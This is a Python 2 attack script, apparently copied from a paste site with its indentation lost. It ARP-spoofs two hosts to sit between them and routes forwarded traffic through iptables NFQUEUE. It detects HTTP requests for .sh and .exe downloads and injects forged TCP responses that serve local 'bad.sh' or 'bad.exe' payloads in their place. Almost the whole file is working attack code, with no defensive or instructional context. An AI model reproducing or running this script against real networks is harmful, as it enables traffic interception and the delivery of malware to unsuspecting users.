#!/usr/bin/python2 from netfilterqueue import NetfilterQueuefrom scapy.all

1. #!/usr/bin/python2
2.  
3. from netfilterqueue import NetfilterQueue
4. from scapy.all import *
5. import os
6. import socket
7. import sys
8. from termcolor import colored
9. import threading
10. import netifaces
11.  
12. #host2 = "172.30.0.1"
13. #host1 = "172.30.122.38"
14. host2 = sys.argv[2]
15. host1 = sys.argv[1]
16. router_ip = "10.0.0.1"
17. #my_mac = "52:54:00:80:3b:32"
18. target_mac = "52:54:00:80:3b:32"
19. my_mac = netifaces.ifaddresses(netifaces.interfaces()[1])[netifaces.AF_LINK][0]['addr']
20.  
21. should_replace = False
22. should_drop = False
23. is_exe = False
24.  
25. os.system('iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
26.  
27. def callback(packet, temp):
28. global should_replace
29. global is_exe
30.  
31. payload = packet.get_payload()
32. pkt = IP(payload)
33. data = print_get(pkt)
34.  
35. if len(str(data)) > 5:
36. print("*"*80)
37. print(str(packet) + "\n")
38. print(str(pkt['TCP'].load))
39. if "GET" in data and ".sh" in data:
40. should_replace = True
41. is_exe = False
42. print(colored("Found GET request for .sh file", "green"))
43.  
44. if "GET" in data and ".exe" in data:
45. should_replace = True
46. is_exe = True
47. print(colored("Found GET request for .exe file", "green"))
48.  
49. if should_replace:
50. should_replace = False
51. print(colored("Replacing this packet", "red"))
52. print("Destination: " + str(pkt['IP'].dst) + ", Source: " + str(pkt['IP'].src))
53. print("Source Port: " + str(pkt['TCP'].sport) + ", Dest Port: " + str(pkt['TCP'].dport))
54. print("Sequence is: " + str(pkt['TCP'].seq) + ", ACK is: " + str(pkt['TCP'].ack))
55. bad = "THIS IS EVIL"
56.  
57.  
58. if is_exe:
59. with open('bad.exe') as f:
60. bad = f.read()
61. else:
62. with open('bad.sh') as f:
63. bad = f.read()
64. bad = ("HTTP/1.1 200 OK\r\n" +
65. "Server: Apache\r\n" +
66. "Content-Length: " + str(len(bad)) + "\r\n" +
67. "Connection: close\r\n" +
68. "Content-type: text/html\r\n" +
69. "\r\n" + bad)
70.  
71. length = len(pkt['TCP'].payload)
72.  
73. s = IP(src=pkt['IP'].dst, dst=pkt['IP'].src) / TCP(sport=pkt['TCP'].dport, dport=pkt['TCP'].sport, flags='PA', seq=pkt['TCP'].ack, ack=pkt['TCP'].seq + length) / str(bad)
74. print("")
75. print(s['TCP'].load)
76.  
77. print(colored("Successfully built packet", "green"))
78.  
79. send(s)
80.  
81. print(colored("Sent forged packet", "green"))
82. packet.drop()
83. return
84.  
85. packet.accept()
86.  
87. def print_get(packet):
88. ret = "\n".join(packet.sprintf("{Raw:%Raw.load%}\n").split("\r\n"))
89. return ret
90.  
91. def mitm():
92. send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=my_mac))
93. send(ARP(op=ARP.is_at, psrc=host2, pdst=host1, hwdst=my_mac))
94.  
95. def unmitm():
96. send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=target_mac))
97.  
98.  
99. def start(packet):
100. t = threading.Thread(target=callback, args = (packet, "hello"))
101. t.daemon = True
102. t.start()
103.  
104. def main():
105. print ("="*80)
106. print("Setting up MITM...")
107. mitm()
108. print("="*80)
109. q = NetfilterQueue()
110. q.bind(1, start)
111. try:
112. q.run() # Main loop
113. except KeyboardInterrupt:
114. print("")
115. print("Re-arping targets")
116. unmitm()
117. print("Unbinding queue")
118. print("Clearing iptable settings")
119. q.unbind()
120. os.system('iptables -F')
121. os.system('iptables -X')
122.  
123. main()